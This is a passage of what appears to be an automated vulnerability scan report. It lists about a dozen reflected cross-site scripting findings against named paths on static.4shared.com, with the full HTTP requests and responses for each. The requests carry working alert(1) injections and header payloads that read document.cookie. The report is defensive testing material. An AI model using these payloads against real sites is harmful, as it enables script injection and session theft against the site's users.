Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles4fa39'-alert(1)-'f8f49bf629e/css/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E76A2E443210C02EECA77D7BA7EC3EA4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:59 GMT
Content-Length: 36373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles4fa39'-alert(1)-'f8f49bf629e/css/765844602/css/flags.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox(
...[SNIP]...

1.27. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4888"-alert(1)-"558cf729ae5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12177EB456CEE1C9AFF4E125678D208A.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundlese4888"-alert(1)-"558cf729ae5/css/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.28. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feb0e'-alert(1)-'8ce8af9f337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/cssfeb0e'-alert(1)-'8ce8af9f337/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/cssfeb0e'-alert(1)-'8ce8af9f337/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5915E9903B2DEC88B256CA3A54AA5A8E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:08 GMT
Content-Length: 36373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/cssfeb0e'-alert(1)-'8ce8af9f337/765844602/css/flags.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();

...[SNIP]...

1.29. http://static.4shared.com/bundles/css/765844602/css/flags.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/765844602/css/flags.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55cbe"-alert(1)-"bce3fca82c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A31C5648BE49CC8FA265F59DDBF3C6C.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css55cbe"-alert(1)-"bce3fca82c4/765844602/css/flags.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function fee
...[SNIP]...

1.30. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b58'-alert(1)-'b3608ddad2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles38b58'-alert(1)-'b3608ddad2e/css/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles38b58'-alert(1)-'b3608ddad2e/css/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39DE5ADE2FC558CE9CAB4850AB8685B2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:59 GMT
Content-Length: 36388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles38b58'-alert(1)-'b3608ddad2e/css/N162308233/css/network.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginB
...[SNIP]...

1.31. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 499e1"-alert(1)-"af069d79772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FE0ABC5F9D90922FE6288DE17D525C3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:56:58 GMT
Content-Length: 36388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles499e1"-alert(1)-"af069d79772/css/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
funct
...[SNIP]...

1.32. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce75a'-alert(1)-'d81462f4e40 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/cssce75a'-alert(1)-'d81462f4e40/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/cssce75a'-alert(1)-'d81462f4e40/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=975BFCE216DC277D4B6515B4AA6828E7.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:09 GMT
Content-Length: 36388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/cssce75a'-alert(1)-'d81462f4e40/N162308233/css/network.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox()
...[SNIP]...

1.33. http://static.4shared.com/bundles/css/N162308233/css/network.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N162308233/css/network.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 216fd"-alert(1)-"7a2ba26463d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://search.4shared.com/search.html?ef9a6--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E310e4e7016=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; WWW_JSESSIONID=C7856C4B2634F6688976E4775B33B16B.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%27%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3; ppVisitDate=1298575915645; search.view2=ls

Response

HTTP/1.1 404 /bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B8D94FCBEA8898B3426C9E00B7FE2E5.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sat, 26 Feb 2011 01:57:07 GMT
Content-Length: 36388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://search.4shared.com/s
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css216fd"-alert(1)-"7a2ba26463d/N162308233/css/network.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.34. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15f72'-alert(1)-'ba9b330d83d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles15f72'-alert(1)-'ba9b330d83d/css/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles15f72'-alert(1)-'ba9b330d83d/css/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=57A182ADDE3C88033B944B24198DC5D9.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:41 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
peof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles15f72'-alert(1)-'ba9b330d83d/css/N90201876/css/ajax-suggestions.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
sh
...[SNIP]...

1.35. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1530f"-alert(1)-"5c8612fc249 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B17461934EAD1091733A85356597E328.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:40 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles1530f"-alert(1)-"5c8612fc249/css/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}

...[SNIP]...

1.36. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2117a"-alert(1)-"c970855b872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C16C4564F26D125869512CC66192510F.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:47 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/bundles/css2117a"-alert(1)-"c970855b872/N90201876/css/ajax-suggestions.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
f
...[SNIP]...

1.37. http://static.4shared.com/bundles/css/N90201876/css/ajax-suggestions.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/N90201876/css/ajax-suggestions.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 670d9'-alert(1)-'8c4cc6edab9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles/css670d9'-alert(1)-'8c4cc6edab9/N90201876/css/ajax-suggestions.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /bundles/css670d9'-alert(1)-'8c4cc6edab9/N90201876/css/ajax-suggestions.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7AF4994B61A1B3DC60155813C2817062.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:49 GMT
Content-Length: 36325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://static.4shared.com/bundles/css670d9'-alert(1)-'8c4cc6edab9/N90201876/css/ajax-suggestions.css',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLo
...[SNIP]...

1.38. http://static.4shared.com/bundles/css/gzip_630963420/css/openid.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://static.4shared.com
Path:	/bundles/css/gzip_630963420/css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 382a0'-alert(1)-'5b12fc25676 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bundles382a0'-alert(1)-'5b12fc25676/css/gzip_630963420/css/openid.css HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
